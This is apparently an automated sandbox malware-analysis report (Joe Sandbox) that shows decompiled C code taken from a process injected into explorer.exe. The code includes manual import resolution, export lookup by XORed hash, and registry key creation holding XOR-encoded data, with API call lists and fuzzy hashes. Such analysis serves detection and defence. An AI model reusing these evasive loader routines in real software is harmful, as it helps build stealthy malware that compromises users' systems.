                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                                              				signed int _v28;
                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                              				struct HINSTANCE__* _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                              				struct HINSTANCE__* _v48;
                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                              				signed int _v56;
                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                              				signed int _v64;
                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                              				signed int _t112;
                                                                                                                                                                                              				signed int _t115;
                                                                                                                                                                                              				struct HINSTANCE__* _t121;
                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                              				void* _t167;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t167 = __ecx;
                                                                                                                                                                                              				_v44 = _v44 & 0x00000000;
                                                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                                                              					_v48 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                                              					_v40 = E02F8EFA7(_t167, _v48, "GetProcAddress");
                                                                                                                                                                                              					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                                              					_v32 = _v52;
                                                                                                                                                                                              					_t109 = 8;
                                                                                                                                                                                              					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                                                                                                                                              						L24:
                                                                                                                                                                                              						return 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v56 = 0x80000000;
                                                                                                                                                                                              					_t112 = 8;
                                                                                                                                                                                              					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                                                                                                                                              					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                                              						_v8 = _v8 + 0x14;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t115 = 8;
                                                                                                                                                                                              					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                                                                                                                                              					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                                              						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
                                                                                                                                                                                              						_v36 = _t121;
                                                                                                                                                                                              						if(_v36 != 0) {
                                                                                                                                                                                              							if( *_v8 == 0) {
                                                                                                                                                                                              								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_v12 =  *_v8 + _a4;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v28 = _v28 & 0x00000000;
                                                                                                                                                                                              							while( *_v12 != 0) {
                                                                                                                                                                                              								_v24 = _v24 & 0x00000000;
                                                                                                                                                                                              								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                              								_v64 = _v64 & 0x00000000;
                                                                                                                                                                                              								_v20 = _v20 & 0x00000000;
                                                                                                                                                                                              								if(( *_v12 & _v56) == 0) {
                                                                                                                                                                                              									_v60 =  *_v12 + _a4;
                                                                                                                                                                                              									_v20 = _v60 + 2;
                                                                                                                                                                                              									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                                                                                                                                                                                              									_v16 = _v40(_v36, _v20);
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_v24 =  *_v12;
                                                                                                                                                                                              									_v20 = _v24 & 0x0000ffff;
                                                                                                                                                                                              									_v16 = _v40(_v36, _v20);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if(_v24 != _v16) {
                                                                                                                                                                                              									_v44 = _v44 + 1;
                                                                                                                                                                                              									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                                                                                                                                              										 *_v12 = _v16;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_v12 =  &(_v12[1]);
                                                                                                                                                                                              								_v28 = _v28 + 4;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v8 = _v8 + 0x14;
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t163 = 0xfffffffd;
                                                                                                                                                                                              						return _t163;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L24;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return __eax | 0xffffffff;
                                                                                                                                                                                              			}

























                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02F93728
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(00000000), ref: 02F937C1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                                              • API String ID: 4133054770-1584408056
                                                                                                                                                                                              • Opcode ID: 13ba2b1276ffec45e7110135fd0bfb640f7ee2d0c096e27ca1f83442242ffdf4
                                                                                                                                                                                              • Instruction ID: 67ffb6c126d71e1dee9af95083a77a400ebe6da72b0c4432a02583e50a75516d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 13ba2b1276ffec45e7110135fd0bfb640f7ee2d0c096e27ca1f83442242ffdf4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 60617C76E10209EFEF00CF98C485BADBBF1BF08355F248599E915AB291C374AA80CF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 30 2f8eebb-2f8eed2 31 2f8ef2f 30->31 32 2f8eed4-2f8eefc 30->32 34 2f8ef31-2f8ef35 31->34 32->31 33 2f8eefe-2f8ef21 call 2f8a43d call 2f8e2c5 32->33 39 2f8ef23-2f8ef2d 33->39 40 2f8ef36-2f8ef4d 33->40 39->31 39->33 41 2f8ef4f-2f8ef57 40->41 42 2f8efa3-2f8efa5 40->42 41->42 43 2f8ef59 41->43 42->34 44 2f8ef5b-2f8ef61 43->44 45 2f8ef71-2f8ef82 44->45 46 2f8ef63-2f8ef65 44->46 48 2f8ef84-2f8ef85 45->48 49 2f8ef87-2f8ef93 LoadLibraryA 45->49 46->45 47 2f8ef67-2f8ef6f 46->47 47->44 47->45 48->49 49->31 50 2f8ef95-2f8ef9f GetProcAddress 49->50 50->31 51 2f8efa1 50->51 51->34
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F8EEBB(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                              				signed int _t47;
                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                              				void* _t56;
                                                                                                                                                                                              				struct HINSTANCE__* _t58;
                                                                                                                                                                                              				_Unknown_base(*)()* _t59;
                                                                                                                                                                                              				intOrPtr _t60;
                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                                                              				void* _t69;
                                                                                                                                                                                              				char _t70;
                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                              				CHAR* _t80;
                                                                                                                                                                                              				void* _t82;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t75 = __ecx;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                                                                                                              				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                                                                                                                                                                              				if(_t41 == 0) {
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t62 = _t41 + __ecx;
                                                                                                                                                                                              				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                                                                                                                                                                              				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                              				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                                                                                                                                                                              				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                                                                                                                                                                              				_t47 = 0;
                                                                                                                                                                                              				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				_v16 = _t63;
                                                                                                                                                                                              				if(_t63 == 0) {
                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					goto L2;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					L2:
                                                                                                                                                                                              					_t49 = E02F8E2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E02F8A43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                                                                                                                                              					_t51 = _v8;
                                                                                                                                                                                              					if((_t49 ^ 0x218fe95b) == _v12) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t73 = _v20;
                                                                                                                                                                                              					_t47 = _t51 + 1;
                                                                                                                                                                                              					_v8 = _t47;
                                                                                                                                                                                              					if(_t47 < _v16) {
                                                                                                                                                                                              						continue;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                                                                                                                                              				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                                                                                                                                              				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                                                                                                                                                                              					return _t80;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t56 = 0;
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						_t70 = _t80[_t56];
                                                                                                                                                                                              						if(_t70 == 0x2e || _t70 == 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                                                                                                                                              						_t56 = _t56 + 1;
                                                                                                                                                                                              						if(_t56 < 0x40) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                                                                                                                                                                              					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                                                                                                                                                                              					if( *((char*)(_t56 + _t80)) != 0) {
                                                                                                                                                                                              						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t40 =  &_v92; // 0x6c6c642e
                                                                                                                                                                                              					_t58 = LoadLibraryA(_t40); // executed
                                                                                                                                                                                              					if(_t58 == 0) {
                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t59 = GetProcAddress(_t58, _t80);
                                                                                                                                                                                              					if(_t59 == 0) {
                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return _t59;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}


























                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 02F8EF8B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 02F8EF97
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: .dll
                                                                                                                                                                                              • API String ID: 2574300362-2738580789
                                                                                                                                                                                              • Opcode ID: 591ef5e86149833fa2018961c21f7f7d18c2cf8ae03c444301df9b178bafcd0d
                                                                                                                                                                                              • Instruction ID: f249b62efe9ce02dd701039933691f947fd12d0a05e63ce5a59a401555dc1b6c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 591ef5e86149833fa2018961c21f7f7d18c2cf8ae03c444301df9b178bafcd0d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D31C176F041559BCB24EF6DC880AAEFBF5AF44388F284469EA05E7351D730E951CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                                                              			E02F8A633(char __ecx, int __edx, void* __fp0, intOrPtr _a4, int* _a8, intOrPtr* _a12) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				int _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				void* _v20;
                                                                                                                                                                                              				int _v24;
                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				int _v44;
                                                                                                                                                                                              				char _v108;
                                                                                                                                                                                              				int _t85;
                                                                                                                                                                                              				char _t89;
                                                                                                                                                                                              				void* _t90;
                                                                                                                                                                                              				char* _t91;
                                                                                                                                                                                              				intOrPtr* _t96;
                                                                                                                                                                                              				void* _t107;
                                                                                                                                                                                              				int* _t115;
                                                                                                                                                                                              				intOrPtr _t118;
                                                                                                                                                                                              				char* _t121;
                                                                                                                                                                                              				intOrPtr _t122;
                                                                                                                                                                                              				intOrPtr _t124;
                                                                                                                                                                                              				intOrPtr _t127;
                                                                                                                                                                                              				char _t129;
                                                                                                                                                                                              				intOrPtr _t130;
                                                                                                                                                                                              				intOrPtr _t132;
                                                                                                                                                                                              				char* _t135;
                                                                                                                                                                                              				int _t139;
                                                                                                                                                                                              				int _t143;
                                                                                                                                                                                              				intOrPtr _t144;
                                                                                                                                                                                              				intOrPtr* _t150;
                                                                                                                                                                                              				int _t151;
                                                                                                                                                                                              				char _t157;
                                                                                                                                                                                              				int _t159;
                                                                                                                                                                                              				intOrPtr _t160;
                                                                                                                                                                                              				intOrPtr _t167;
                                                                                                                                                                                              				int _t172;
                                                                                                                                                                                              				char* _t173;
                                                                                                                                                                                              				char* _t174;
                                                                                                                                                                                              				char _t175;
                                                                                                                                                                                              				void* _t176;
                                                                                                                                                                                              				void* _t177;
                                                                                                                                                                                              				void* _t179;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t172 = 0;
                                                                                                                                                                                              				_v24 = __edx;
                                                                                                                                                                                              				_t173 = 0;
                                                                                                                                                                                              				_v32 = __ecx;
                                                                                                                                                                                              				_v28 = 0;
                                                                                                                                                                                              				_v8 = 0x80000001;
                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                              				_t85 = E02F88BDE(0x110);
                                                                                                                                                                                              				_t151 = _t85;
                                                                                                                                                                                              				_v44 = _t151;
                                                                                                                                                                                              				_t180 = _t151;
                                                                                                                                                                                              				if(_t151 == 0) {
                                                                                                                                                                                              					return _t85;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t154 = _a4;
                                                                                                                                                                                              				 *((intOrPtr*)(_t151 + 0x108)) = _a4;
                                                                                                                                                                                              				E02F8C43A(_a4, __edx, _t180, __fp0, _t154,  &_v108);
                                                                                                                                                                                              				_t157 = _v108;
                                                                                                                                                                                              				_t89 = _t157;
                                                                                                                                                                                              				if(_t157 - 0x61 <= 0x19) {
                                                                                                                                                                                              					_t89 = _t89 - 0x20;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_v108 = _t89;
                                                                                                                                                                                              				_t90 = E02F89DD8(0xf30);
                                                                                                                                                                                              				_t159 = _v24;
                                                                                                                                                                                              				_v16 = _t90;
                                                                                                                                                                                              				if(_t159 == 0) {
                                                                                                                                                                                              					L15:
                                                                                                                                                                                              					_t160 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              					__eflags =  *((intOrPtr*)(_t160 + 0x214)) - 3;
                                                                                                                                                                                              					if( *((intOrPtr*)(_t160 + 0x214)) != 3) {
                                                                                                                                                                                              						_push(_t172);
                                                                                                                                                                                              						_push( &_v108);
                                                                                                                                                                                              						_push("\\");
                                                                                                                                                                                              						_t91 = E02F89A07(_t90);
                                                                                                                                                                                              						_t177 = _t177 + 0x10;
                                                                                                                                                                                              						L19:
                                                                                                                                                                                              						_t173 = _t91;
                                                                                                                                                                                              						_v20 = _t173;
                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v24 = _t172;
                                                                                                                                                                                              					_v8 = 0x80000003;
                                                                                                                                                                                              					_t118 =  *0x2f9f820; // 0x508f8b8
                                                                                                                                                                                              					 *((intOrPtr*)(_t118 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x110)))),  &_v24);
                                                                                                                                                                                              					__eflags = _v24 - _t173;
                                                                                                                                                                                              					if(_v24 == _t173) {
                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(_t172);
                                                                                                                                                                                              					_push( &_v108);
                                                                                                                                                                                              					_t121 = "\\";
                                                                                                                                                                                              					_push(_t121);
                                                                                                                                                                                              					_push(_v16);
                                                                                                                                                                                              					_push(_t121);
                                                                                                                                                                                              					_t91 = E02F89A07(_v24);
                                                                                                                                                                                              					_t177 = _t177 + 0x18;
                                                                                                                                                                                              					goto L19;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t122 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              					_push( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x110)))));
                                                                                                                                                                                              					_t124 =  *0x2f9f820; // 0x508f8b8
                                                                                                                                                                                              					_push(_t159);
                                                                                                                                                                                              					if( *((intOrPtr*)(_t124 + 0x68))() != 0) {
                                                                                                                                                                                              						_t90 = _v16;
                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v12 = _t172;
                                                                                                                                                                                              					_t127 =  *0x2f9f820; // 0x508f8b8
                                                                                                                                                                                              					_v8 = 0x80000003;
                                                                                                                                                                                              					 *((intOrPtr*)(_t127 + 0x20))(_v24,  &_v12);
                                                                                                                                                                                              					if(_v12 == _t173) {
                                                                                                                                                                                              						L20:
                                                                                                                                                                                              						E02F88B9C( &_v16);
                                                                                                                                                                                              						if(RegOpenKeyExA(_v8, _t173, _t172, 0x20019,  &_v28) == 0) {
                                                                                                                                                                                              							_t96 = _a8;
                                                                                                                                                                                              							__eflags = _t96;
                                                                                                                                                                                              							if(_t96 != 0) {
                                                                                                                                                                                              								 *_t96 = 1;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							RegCloseKey(_v28);
                                                                                                                                                                                              							L28:
                                                                                                                                                                                              							if(_t173 == 0) {
                                                                                                                                                                                              								L32:
                                                                                                                                                                                              								E02F88BF4( &_v44, 0x110);
                                                                                                                                                                                              								E02F88D6D( &_v108, _t172, 0x40);
                                                                                                                                                                                              								_t151 = _t172;
                                                                                                                                                                                              								L33:
                                                                                                                                                                                              								E02F88BF4( &_v20, 0xffffffff);
                                                                                                                                                                                              								return _t151;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							 *((intOrPtr*)(_t151 + 0x10c)) = _v8;
                                                                                                                                                                                              							_t107 = E02F8A43D(_t173);
                                                                                                                                                                                              							 *_t151 = _t107;
                                                                                                                                                                                              							if(_t107 == 0) {
                                                                                                                                                                                              								goto L33;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							do {
                                                                                                                                                                                              								L30:
                                                                                                                                                                                              								 *(_t151 + _t172 + 4) =  *(_t176 + (_t172 & 0x00000003) + 8) ^ _t173[_t172];
                                                                                                                                                                                              								_t172 = _t172 + 1;
                                                                                                                                                                                              							} while (_t172 <  *_t151);
                                                                                                                                                                                              							goto L33;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v16 = _t172;
                                                                                                                                                                                              						if(RegCreateKeyA(_v8, _t173,  &_v16) != 0) {
                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t115 = _a8;
                                                                                                                                                                                              						if(_t115 != 0) {
                                                                                                                                                                                              							 *_t115 = _t172;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						RegCloseKey(_v16);
                                                                                                                                                                                              						goto L28;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(_t172);
                                                                                                                                                                                              					_push(_v16);
                                                                                                                                                                                              					_t174 = "\\";
                                                                                                                                                                                              					_push(_t174);
                                                                                                                                                                                              					_t129 = E02F89A07(_v12);
                                                                                                                                                                                              					_t177 = _t177 + 0x10;
                                                                                                                                                                                              					_v40 = _t129;
                                                                                                                                                                                              					if(_t129 == 0) {
                                                                                                                                                                                              						goto L32;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push( &_v36);
                                                                                                                                                                                              					_push(0x20019);
                                                                                                                                                                                              					_push(_t172);
                                                                                                                                                                                              					_push(_t129);
                                                                                                                                                                                              					_t130 =  *0x2f9f820; // 0x508f8b8
                                                                                                                                                                                              					_push(_v8);
                                                                                                                                                                                              					if( *((intOrPtr*)(_t130 + 0x14))() == 0) {
                                                                                                                                                                                              						_t132 =  *0x2f9f820; // 0x508f8b8
                                                                                                                                                                                              						 *((intOrPtr*)(_t132 + 0x1c))(_v36);
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t139 = E02F89DF2( &_v36, 0x9c4);
                                                                                                                                                                                              						_push(_t172);
                                                                                                                                                                                              						_push(_t139);
                                                                                                                                                                                              						_push(0x2f9c9a0);
                                                                                                                                                                                              						_v24 = _t139;
                                                                                                                                                                                              						_t175 = E02F89A5A(_v32);
                                                                                                                                                                                              						_v32 = _t175;
                                                                                                                                                                                              						E02F88BAF( &_v24);
                                                                                                                                                                                              						_t179 = _t177 + 0x18;
                                                                                                                                                                                              						_t143 = E02F89930(_v12);
                                                                                                                                                                                              						_push(_t175);
                                                                                                                                                                                              						_push(_t143);
                                                                                                                                                                                              						_push(_v8);
                                                                                                                                                                                              						_v24 = _t143;
                                                                                                                                                                                              						_t144 =  *0x2f9f820; // 0x508f8b8
                                                                                                                                                                                              						if( *((intOrPtr*)(_t144 + 0x30))() == 0) {
                                                                                                                                                                                              							_t150 = _a12;
                                                                                                                                                                                              							if(_t150 != 0) {
                                                                                                                                                                                              								 *_t150 = 1;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E02F88BF4( &_v32, 0xfffffffe);
                                                                                                                                                                                              						E02F88BF4( &_v24, 0xfffffffe);
                                                                                                                                                                                              						_t177 = _t179 + 0x10;
                                                                                                                                                                                              						_t174 = "\\";
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t135 = E02F89A07(_v12);
                                                                                                                                                                                              					_t167 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					_t177 = _t177 + 0x18;
                                                                                                                                                                                              					_t173 = _t135;
                                                                                                                                                                                              					_v20 = _t173;
                                                                                                                                                                                              					 *((intOrPtr*)(_t167 + 0x34))(_v12, _t174, _v16, _t174,  &_v108, _t172);
                                                                                                                                                                                              					E02F88BF4( &_v40, 0xffffffff);
                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}
                                                                                                                                                                                              0x02f8a8ce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a8d2
                                                                                                                                                                                              0x02f8a869
                                                                                                                                                                                              0x02f8a87b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a87d
                                                                                                                                                                                              0x02f8a882
                                                                                                                                                                                              0x02f8a884
                                                                                                                                                                                              0x02f8a884
                                                                                                                                                                                              0x02f8a8a0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a8a0
                                                                                                                                                                                              0x02f8a6eb
                                                                                                                                                                                              0x02f8a6ec
                                                                                                                                                                                              0x02f8a6ef
                                                                                                                                                                                              0x02f8a6f4
                                                                                                                                                                                              0x02f8a6f8
                                                                                                                                                                                              0x02f8a6fd
                                                                                                                                                                                              0x02f8a700
                                                                                                                                                                                              0x02f8a705
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a70e
                                                                                                                                                                                              0x02f8a70f
                                                                                                                                                                                              0x02f8a714
                                                                                                                                                                                              0x02f8a715
                                                                                                                                                                                              0x02f8a716
                                                                                                                                                                                              0x02f8a71b
                                                                                                                                                                                              0x02f8a723
                                                                                                                                                                                              0x02f8a79b
                                                                                                                                                                                              0x02f8a7a3
                                                                                                                                                                                              0x02f8a725
                                                                                                                                                                                              0x02f8a72a
                                                                                                                                                                                              0x02f8a72f
                                                                                                                                                                                              0x02f8a730
                                                                                                                                                                                              0x02f8a731
                                                                                                                                                                                              0x02f8a739
                                                                                                                                                                                              0x02f8a741
                                                                                                                                                                                              0x02f8a747
                                                                                                                                                                                              0x02f8a74a
                                                                                                                                                                                              0x02f8a752
                                                                                                                                                                                              0x02f8a755
                                                                                                                                                                                              0x02f8a75a
                                                                                                                                                                                              0x02f8a75b
                                                                                                                                                                                              0x02f8a75c
                                                                                                                                                                                              0x02f8a75f
                                                                                                                                                                                              0x02f8a762
                                                                                                                                                                                              0x02f8a76c
                                                                                                                                                                                              0x02f8a76e
                                                                                                                                                                                              0x02f8a773
                                                                                                                                                                                              0x02f8a775
                                                                                                                                                                                              0x02f8a775
                                                                                                                                                                                              0x02f8a773
                                                                                                                                                                                              0x02f8a781
                                                                                                                                                                                              0x02f8a78c
                                                                                                                                                                                              0x02f8a791
                                                                                                                                                                                              0x02f8a794
                                                                                                                                                                                              0x02f8a794
                                                                                                                                                                                              0x02f8a7b3
                                                                                                                                                                                              0x02f8a7b8
                                                                                                                                                                                              0x02f8a7be
                                                                                                                                                                                              0x02f8a7c1
                                                                                                                                                                                              0x02f8a7c3
                                                                                                                                                                                              0x02f8a7c9
                                                                                                                                                                                              0x02f8a7d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a7d8

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 02F88BDE: RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                                • Part of subcall function 02F88BF4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 02F88C3A
                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,02F8A621,?,?,00000001), ref: 02F8A85F
                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000,?,?,00000001), ref: 02F8A876
                                                                                                                                                                                              • RegCloseKey.KERNELBASE(02F8A621,?,?,00000001), ref: 02F8A8A0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$AllocateCloseCreateFreeOpen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3570936880-0
                                                                                                                                                                                              • Opcode ID: e11f185a922f43dafde0674a1c544ca2e354ee2dcc89f142562c408c7bfaeac5
                                                                                                                                                                                              • Instruction ID: 211e55b44d0d7e836c8835e0fbff61461c43764424275797bf4ef267568f3c34
                                                                                                                                                                                              • Opcode Fuzzy Hash: e11f185a922f43dafde0674a1c544ca2e354ee2dcc89f142562c408c7bfaeac5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F913AB1E00209AFDB11EFA5CC44EEEFBB9EF48390F54416AE615E7250D7719A01DBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
